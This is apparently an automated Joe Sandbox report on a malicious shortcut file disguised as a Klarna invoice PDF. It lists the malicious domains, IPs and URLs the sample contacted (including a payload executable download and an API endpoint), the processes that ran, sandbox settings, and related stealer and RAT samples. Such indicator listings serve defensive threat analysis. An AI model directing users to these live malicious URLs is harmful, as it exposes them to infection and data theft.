            https://passworoggre.click:443/api0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAK0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontend20%Avira URL Cloudsafe
            https://naubeautylus.ch/I0%Avira URL Cloudsafe
            https://passworoggre.click/apiO0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontend:0%Avira URL Cloudsafe
            https://naubeautylus.c0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendhttps://naubeautylus.ch/Headerfrontend070%Avira URL Cloudsafe
            http://naubeautylus.ch0%Avira URL Cloudsafe
            https://naubeautylus.ch/HeaderfrontenduserLOCAL0%Avira URL Cloudsafe
            https://naubeautylus.ch/HeaderfrontendamFiles=C:0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWPY.e0%Avira URL Cloudsafe
            https://naubeautylus.ch/HeaderfrontendH0%Avira URL Cloudsafe
            passworoggre.click0%Avira URL Cloudsafe
            http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor0%Avira URL Cloudsafe
            https://naubeautylus.ch/0%Avira URL Cloudsafe
            http://c0rl.m%L0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendoft0%Avira URL Cloudsafe
            https://passworoggre.click/Q0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendm0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendj0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWPY.0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendf0%Avira URL Cloudsafe
            https://naubeautylus.ch/IM0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontendt0%Avira URL Cloudsafe
            http://crl.microsoftP0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWPY0%Avira URL Cloudsafe
            https://naubeautylus.ch/HeaderfrontendsLMEMP0%Avira URL Cloudsafe
            http://appsyndication.org/2006/appsyn0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            naubeautylus.ch
            62.182.21.105
            truetrue
              unknown
              passworoggre.click
              104.21.59.81
              truetrue
                unknown
                x1.i.lencr.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  sordid-snaked.cyoufalse
                    high
                    deafeninggeh.bizfalse
                      high
                      https://naubeautylus.ch/KlarnaInvoice42611.pdffalse
                      • Avira URL Cloud: safe
                      unknown
                      https://naubeautylus.ch/IMAKBWPY.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://passworoggre.click/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      diffuculttan.xyzfalse
                        high
                        effecterectz.xyzfalse
                          high
                          wrathful-jammy.cyoufalse
                            high
                            https://naubeautylus.ch/Headerfrontendtrue
                            • Avira URL Cloud: safe
                            unknown
                            awake-weaves.cyoufalse
                              high
                              immureprech.bizfalse
                                high
                                passworoggre.clicktrue
                                • Avira URL Cloud: safe
                                unknown
                                debonairnukk.xyzfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://naubeautylus.ch/IMAKBWPpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.vmware.com/0pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0pyexec.exe.17.dr, pyexec.exe.18.drfalse
                                      high
                                      http://ocsp.sectigo.com0pyexec.exe.17.dr, pyexec.exe.18.drfalse
                                        high
                                        https://naubeautylus.chpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#pyexec.exe.17.dr, pyexec.exe.18.drfalse
                                              high
                                              https://passworoggre.click/explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570696781.0000000003428000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://naubeautylus.ch/Headerfrontend...mshta.exe, 00000004.00000002.2246667189.000001D048D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://naubeautylus.ch/HeaderfrontendWWC:mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                high
                                                https://naubeautylus.ch/IMAKBWpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
                                                  high
                                                  https://naubeautylus.ch/HeaderfrontendC:mshta.exe, 00000004.00000002.2244789492.000001C846210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://naubeautylus.ch/IMApowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://naubeautylus.ch/IMAKBpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://naubeautylus.ch/IMAKBWPY.expowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://passworoggre.click:443/apiexplorer.exe, 00000016.00000003.2570257382.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572041044.00000000033B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://naubeautylus.ch/Headerfrontend$global:?powershell.exefalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://naubeautylus.ch/Ipowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://passworoggre.click/apiOexplorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570985206.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572182630.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://naubeautylus.ch/IMAKpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1948905614.000001EF00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://naubeautylus.ch/Headerfrontend2mshta.exe, 00000004.00000002.2244789492.000001C846210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1807192834.000001EFFC242000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                                          high
                                                          https://naubeautylus.cpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://python.org/dev/peps/pep-0263/python27.dll.17.drfalse
                                                            high
                                                            https://naubeautylus.ch/Headerfrontend:mshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://naubeautylus.ch/Headerfrontendhttps://naubeautylus.ch/Headerfrontend07mshta.exe, 00000004.00000003.2228736011.000001D04BFA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://sectigo.com/CPS0pyexec.exe.17.dr, pyexec.exe.18.drfalse
                                                                high
                                                                https://naubeautylus.ch/HeaderfrontenduserLOCALmshta.exe, 00000004.00000002.2245886446.000001C8463F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://naubeautylus.ch/HeaderfrontendamFiles=C:WMIC.exe, 00000000.00000002.1752768362.0000017A53C70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://naubeautylus.chpowershell.exe, 00000006.00000002.1948905614.000001EF00854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl3.digicerpyexec.exe, 00000012.00000002.2151008989.0000000008783000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#pyexec.exe.17.dr, pyexec.exe.18.drfalse
                                                                          high
                                                                          http://www.vmware.com/0/pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://naubeautylus.ch/IMAKBWPY.epowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crl.ver)svchost.exe, 00000005.00000002.2998510315.000001EFFC411000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgorpowershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmp, IMAKBWPY.exe, 00000010.00000000.1937547411.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe, 00000011.00000000.1942070181.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe.16.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://naubeautylus.ch/HeaderfrontendHmshta.exe, 00000004.00000002.2244755190.000001C846200000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://c0rl.m%Lpyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.symauth.com/cps0(pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://naubeautylus.ch/mshta.exe, 00000004.00000002.2245031576.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://passworoggre.click/Qexplorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570696781.0000000003428000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://naubeautylus.ch/IMpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://naubeautylus.ch/Headerfrontendoftmshta.exe, 00000004.00000002.2245031576.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2228118175.000001C846286000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846286000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypyexec.exe.17.dr, pyexec.exe.18.drfalse
                                                                                    high
                                                                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000005.00000003.1807192834.000001EFFC242000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                                                                                      high
                                                                                      http://www.symauth.com/rpa00pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://naubeautylus.ch/IMAKBWPY.powershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.info-zip.org/pyexec.exe, 00000012.00000002.2153513648.0000000008845000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008800000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.00000000050D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://naubeautylus.ch/Headerfrontendjmshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://naubeautylus.ch/HeaderfrontendmWMIC.exe, 00000000.00000003.1750973050.0000017A53AF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.1752627353.0000017A53B06000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.1751097652.0000017A53B05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://aka.ms/pscore68powershell.exe, 00000006.00000002.1948905614.000001EF00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://naubeautylus.ch/Headerfrontendfmshta.exe, 00000004.00000003.2228118175.000001C846251000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221355733.000001C846250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2245031576.000001C846251000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://naubeautylus.ch/Headerfrontendtmshta.exe, 00000004.00000002.2244789492.000001C846239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crl.microsoftPexplorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://naubeautylus.ch/IMAKBWPYpowershell.exe, 00000006.00000002.1948905614.000001EF0069E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://naubeautylus.ch/HeaderfrontendsLMEMPmshta.exe, 00000004.00000003.2220749210.000001D04CE59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247390039.000001D04CE59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://appsyndication.org/2006/appsynIMAKBWPY.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            62.182.21.105
                                                                                            naubeautylus.chUnited Kingdom
                                                                                            200083SUB6GBtrue
                                                                                            104.21.59.81
                                                                                            passworoggre.clickUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            IP
                                                                                            127.0.0.1
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1575736
                                                                                            Start date and time:2024-12-16 09:13:06 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 9m 42s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:24
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:KlarnaInvoice229837.pdf.lnk
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.evad.winLNK@38/63@6/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 60%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 126
                                                                                            • Number of non-executed functions: 265
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .lnk
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 184.28.90.27, 184.28.88.176, 23.32.239.9, 23.32.239.56, 18.213.11.84, 34.237.241.83, 50.16.47.176, 54.224.241.105, 162.159.61.3, 172.64.41.3, 23.195.39.65, 2.19.198.27, 4.245.163.56, 23.47.168.24, 13.107.246.63, 172.202.163.200
                                                                                            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                                                                            • Execution Graph export aborted for target mshta.exe, PID 6960 because there are no executed function
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 1344 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            03:14:05API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                            03:14:11API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                            03:14:12API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                            03:14:13API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                            03:14:25API Interceptor1x Sleep call for process: IMAKBWPY.exe modified
                                                                                            03:14:32API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                                            03:15:23API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                            03:15:26API Interceptor2x Sleep call for process: explorer.exe modified
                                                                                            No context
                                                                                            No context
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                            • 104.21.50.161
                                                                                            Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 104.21.96.1
                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.67.152
                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 104.21.67.152
                                                                                            webhook.exeGet hashmaliciousUnknownBrowse
                                                                                            • 162.159.138.232
                                                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • 104.21.84.67
                                                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • 172.67.187.200
                                                                                            https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                            • 104.26.10.61
                                                                                            https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.89.91
                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                            • 104.21.79.7
                                                                                            SUB6GBWk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.21.92
                                                                                            http://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.22.52
                                                                                            https://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.22.52
                                                                                            https://cmax.co.uk/qw.PDFGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.22.52
                                                                                            WSGZf4NplR.elfGet hashmaliciousMiraiBrowse
                                                                                            • 62.182.18.128
                                                                                            Transitdokumente.zipGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.20.50
                                                                                            Transitdokumente.zipGet hashmaliciousUnknownBrowse
                                                                                            • 62.182.20.50
                                                                                            KTi123tZU6Get hashmaliciousUnknownBrowse
                                                                                            • 62.182.18.121
                                                                                            s422uUu30YGet hashmaliciousMiraiBrowse
                                                                                            • 185.41.12.55
                                                                                            Linux_amd64Get hashmaliciousUnknownBrowse
                                                                                            • 185.41.8.59
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eArrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 62.182.21.105
                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 62.182.21.105
                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 62.182.21.105
                                                                                            jignesh.exeGet hashmaliciousQuasarBrowse
                                                                                            • 62.182.21.105
                                                                                            skibidi.exeGet hashmaliciousQuasarBrowse
                                                                                            • 62.182.21.105
                                                                                            vanilla.exeGet hashmaliciousQuasarBrowse
                                                                                            • 62.182.21.105
                                                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • 62.182.21.105
                                                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • 62.182.21.105
                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                            • 62.182.21.105
                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                            • 62.182.21.105
                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.59.81
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 104.21.59.81
                                                                                            wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.59.81
                                                                                            37f463bf4616ecd445d4a1937da06e19Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
